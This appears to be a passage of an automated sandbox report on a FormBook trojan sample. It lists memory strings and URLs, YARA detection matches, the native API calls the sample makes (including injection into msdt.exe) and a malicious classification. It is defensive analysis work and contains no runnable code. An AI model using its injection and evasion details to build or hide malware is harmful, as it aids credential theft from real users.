          Source: msdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpString found in binary or memory: https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js
          Source: msdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpString found in binary or memory: https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.js
          Source: msdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpString found in binary or memory: https://plus.google.com/
          Source: DNPr7t0GMY.exe, 00000002.00000002.220290008.0000000003320000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
          Source: msdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpString found in binary or memory: https://www.casar.com
          Source: msdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpString found in binary or memory: https://www.casar.com/assunto/casamentos/casamentos-reais/
          Source: msdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpString found in binary or memory: https://www.casar.com/assunto/casamentos/decoracao-de-casamento/
          Source: msdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpString found in binary or memory: https://www.casar.com/assunto/cha-de-panela/
          Source: msdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpString found in binary or memory: https://www.casar.com/assunto/lua-de-mel-2/
          Source: msdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpString found in binary or memory: https://www.casar.com/assunto/noivas/dicas-para-noivas/
          Source: msdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpString found in binary or memory: https://www.casar.com/assunto/noivas/vestidos-de-noiva/
          Source: msdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpString found in binary or memory: https://www.casar.com/assunto/organizacao/
          Source: msdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
          Source: msdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-N7Z9MZC
          Source: msdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpString found in binary or memory: https://www.youtube.com/casarpontocom

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000A.00000002.478198621.0000000000C50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.216484865.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.220966733.00000000042E9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.271117141.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.478065429.0000000000C20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.271551704.0000000000CF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.477312798.0000000000780000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.271485121.0000000000CC0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.0.DNPr7t0GMY.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.DNPr7t0GMY.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.DNPr7t0GMY.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.DNPr7t0GMY.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 0000000A.00000002.478198621.0000000000C50000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.478198621.0000000000C50000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.216484865.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.216484865.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.220966733.00000000042E9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.220966733.00000000042E9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.271117141.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.271117141.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.478065429.0000000000C20000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.478065429.0000000000C20000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.271551704.0000000000CF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.271551704.0000000000CF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.477312798.0000000000780000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.477312798.0000000000780000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.271485121.0000000000CC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.271485121.0000000000CC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.0.DNPr7t0GMY.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.0.DNPr7t0GMY.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.DNPr7t0GMY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.DNPr7t0GMY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.0.DNPr7t0GMY.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.0.DNPr7t0GMY.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.DNPr7t0GMY.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.DNPr7t0GMY.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          .NET source code contains very large stringsShow sources
          Source: DNPr7t0GMY.exe, ISectionEntry.csLong String: Length: 326320
          Source: 2.0.DNPr7t0GMY.exe.f10000.0.unpack, ISectionEntry.csLong String: Length: 326320
          Source: 2.2.DNPr7t0GMY.exe.f10000.0.unpack, ISectionEntry.csLong String: Length: 326320
          Source: 4.0.DNPr7t0GMY.exe.4f0000.2.unpack, ISectionEntry.csLong String: Length: 326320
          Source: 4.0.DNPr7t0GMY.exe.4f0000.0.unpack, ISectionEntry.csLong String: Length: 326320
          Source: 4.2.DNPr7t0GMY.exe.4f0000.1.unpack, ISectionEntry.csLong String: Length: 326320
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_004181B0 NtCreateFile,
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_00418260 NtReadFile,
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_004182E0 NtClose,
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_00418390 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_004182AC NtReadFile,
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_0041838B NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D195D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D19540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D196D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D196E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D19650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D19660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D19FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D19780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D19710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D19840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D19860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D199A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D19910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D19A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D195F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D19560 NtWriteFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D1AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D19520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D19670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D19610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D197A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D1A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D19770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D19760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D1A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D19730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D198F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D198A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D1B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D19820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D199D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D19950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D19A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D19A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D19A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D19A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D1A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D19B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_007981B0 NtCreateFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_00798260 NtReadFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_007982E0 NtClose,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_00798390 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_007982AC NtReadFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0079838B NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 2_2_0313C2B0
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 2_2_031399A0
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_00401030
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_0041B8B1
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_0041B963
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_00408C4B
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_00408C50
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_0041B493
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_0041B496
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_0041C539
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_00402D89
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_00402D90
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_0041CE85
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_0041BF12
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_0041C795
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_00402FB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D9D466
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CE841F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04DA25DD
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CED5E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D02581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04DA1D55
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04DA2D07
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CD0D20
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04DA2EF7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D9D616
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CF6E30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04DA1FF1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04DA28EC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CEB090
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D020A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04DA20A8
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D91002
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CDF900
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CF4120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04DA22AE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D9DBD2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D0EBB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04DA2B28
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0079B8B1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0079B954
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_00788C50
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_00788C4B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0079B493
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0079B496
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0079C539
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_00782D90
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_00782D89
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0079CE85
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0079BF12
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_00782FB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0079C795
          Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 04CDB150 appears 35 times
          Source: DNPr7t0GMY.exe, 00000002.00000002.220966733.00000000042E9000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameKygo.dll* vs DNPr7t0GMY.exe
          Source: DNPr7t0GMY.exe, 00000002.00000002.220966733.00000000042E9000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDSASignature.dll@ vs DNPr7t0GMY.exe
          Source: DNPr7t0GMY.exe, 00000002.00000000.207658511.0000000001056000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameAppDomainTimerSafeHandle.exeB vs DNPr7t0GMY.exe
          Source: DNPr7t0GMY.exe, 00000004.00000002.271750109.000000000113F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs DNPr7t0GMY.exe
          Source: DNPr7t0GMY.exe, 00000004.00000002.271279344.0000000000636000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameAppDomainTimerSafeHandle.exeB vs DNPr7t0GMY.exe
          Source: DNPr7t0GMY.exe, 00000004.00000002.272130410.0000000002D50000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemsdt.exej% vs DNPr7t0GMY.exe
          Source: DNPr7t0GMY.exeBinary or memory string: OriginalFilenameAppDomainTimerSafeHandle.exeB vs DNPr7t0GMY.exe
          Source: DNPr7t0GMY.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 0000000A.00000002.478198621.0000000000C50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.478198621.0000000000C50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.216484865.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.216484865.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.220966733.00000000042E9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.220966733.00000000042E9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.271117141.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.271117141.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.478065429.0000000000C20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.478065429.0000000000C20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.271551704.0000000000CF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.271551704.0000000000CF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.477312798.0000000000780000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.477312798.0000000000780000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.271485121.0000000000CC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.271485121.0000000000CC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.0.DNPr7t0GMY.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.0.DNPr7t0GMY.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.DNPr7t0GMY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.DNPr7t0GMY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.0.DNPr7t0GMY.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.0.DNPr7t0GMY.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.DNPr7t0GMY.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.DNPr7t0GMY.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@13/10
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DNPr7t0GMY.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6244:120:WilError_01
          Source: DNPr7t0GMY.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: DNPr7t0GMY.exe, 00000002.00000002.220290008.0000000003320000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
          Source: DNPr7t0GMY.exe, 00000002.00000002.220290008.0000000003320000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: DNPr7t0GMY.exe, 00000002.00000002.220290008.0000000003320000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE id=@id;
          Source: DNPr7t0GMY.exe, 00000002.00000002.220290008.0000000003320000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
          Source: DNPr7t0GMY.exe, 00000002.00000002.220290008.0000000003320000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
